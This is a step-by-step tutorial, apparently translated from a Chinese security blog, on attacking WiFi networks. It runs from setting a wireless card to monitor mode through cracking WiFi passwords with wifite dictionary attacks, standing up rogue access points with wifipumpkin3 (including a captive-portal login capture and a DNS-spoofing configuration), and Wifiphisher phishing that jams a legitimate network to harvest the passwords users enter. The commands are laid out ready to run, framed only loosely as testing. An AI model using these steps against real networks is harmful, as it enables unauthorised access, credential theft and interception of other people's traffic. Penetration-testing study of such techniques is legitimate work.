Preparation

External network card: netcore NW392

图片

Chip Information

图片

This device currently requires manual driver installation

图片

Code:

1
apt install realtek-rtl88xxau-dkms // need to enter y to continue installation

图片

Note: Due to the network speed, 69% and 85% of the progress may need to wait for some time

图片

Installation is complete, reboot

图片

Wireless network card status query

iwconfig //View wireless information

图片

Mode:Monitor can listen to the accessory wireless device communication

Mode:Managed can connect to attached wireless devices

Change the working mode of the NIC: iwconfig NIC name mode Working mode.

Examples of common modes for testing are as follows

Code:

1
2
iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor

图片

Practical explanation

Cracking WIFI password, using wifite tool for testing

New version of wifite: https://github.com/kimocoder/wifite2

Installation and startup method.

Code:

1
2
3
4
5
$ git clone https://github.com/kimocoder/wifite2.git
$ pip3 install -r requirements.txt //install dependencies, no need to execute this command in kali system under normal circumstances (dependencies are satisfied)
$ cd wifite2
$ sudo . /wifite.py
$ sudo python3 setup.py install //install to system options

图片

Note: The current kali built-in wifite version is not new to GitHub (root privileges are required to run the wifite command for attack operations)

图片

Run with the -h argument to display wifite help information

图片

Enter the -h -v parameter to run to display more help information

图片

This output allows you to view the default password package save path

GitHub —- current path wordlist-probable.txt

图片

Kali —-usr/share/dict/wordlist-probable.txt

图片

  • Default attack method.
    Run wifite with root privileges without parameters

Detect the wireless card of the running device and change the mode of the wireless card to monitor (to detect nearby WIFI communication)

图片

Start automatic scanning of attached WIFI devices, until you enter Ctrl+c to pause

图片

Enter Ctrl+c to pause the scan and enter the corresponding parameters according to the purpose of the test to start WIFI password cracking

Crack the specified device: enter the corresponding serial number of WiFi

All devices: input “all” parameter

图片

  • Attack the specified device.
    You can use the -e parameter plus the device essid information to specify the operation

图片

  • Commonly used combination of parameters explained.
    Note: Here is the command executed under the path of wifite folder

sudo . /wifite.py —kill -i wlan0 -mac -pow 50 —dict /password.txt

Kill conflicting processes using the wlan0 NIC with mac address randomization enabled and then attacking WIFI devices with signal strength greater than or equal to 50 using the specified dictionary

图片

Spoofing attack, use wifipumpkin3 tool for testing

GitHub: https://github.com/P0cL4bs/wifipumpkin3

Online installation manual: https://wifipumpkin3.github.io/docs/getting-started#installation

Example installation on a kali system

Code:

1
2
3
4
5
sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

Note: scapy warning issue

图片

Update scapy version

https://github.com/secdev/scapy

图片

图片

  • Create a WiFi
    Code:
1
2
3
4
5
6
7
8
9
10
11
12
set interface wlan0
# Set the name of the access point to be created
set ssid TestWIFI
# Set noproxy plguin
set proxy noproxy
# Ignore all logs from the pydns_server
ignore pydns_server
start

//pumpkinproxy - Proxy for intercepting network traffic for the TCP protocol.
//captiveflask - Allows to block users from accessing the internet until they open a login page.
//noproxy - Runs proxy-less redirected traffic

图片

Search for the created wifi

图片

Visit the test URL and enter the account password to log in and test

http://testphp.vulnweb.com/login.php

图片

图片

  • Convenient startup script
    Save the commands from the previous test to a file with the pulp suffix

Load with the —pulp parameter

图片

  • Proxy mode settings
    图片

Default pumpkinproxy // proxy available for intercept mode

Turn on the proxy plugin

图片

Turn off the proxy plugin

图片

captiveflask proxy mode //specific page that pops up after connecting to WIFI

图片

图片

Captured submissions

图片

  • DNS hijacking
    Code:
1
2
3
4
5
6
7
8
9
set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start

图片

  • Other common command parameters
    show //Show available attack modules

图片

jobs //Display the attack module running in the background

图片

ap //Display information about the created WIFI

图片

proxies //show available proxy modes and functions

图片

security //WIFI security mode, you can set the password and protection method

图片

Change password

图片

Phishing attack, use Wifiphisher tool to test

GitHub: https://github.com/wifiphisher/wifiphisher

Note: Two wireless devices are required

图片

Automatically scan for attached WIFI devices

图片

Select the target you want to test Enter to confirm, here select verify spoofing mode for demonstration

1 - Network Manager Connect

图片

Generate the WIFI that needs to be authenticated

图片

Interfere with the normal WIFI and automatically connect to the generated WIFI

图片

Display the attack

图片

ESC exits and the captured input is displayed in the terminal

图片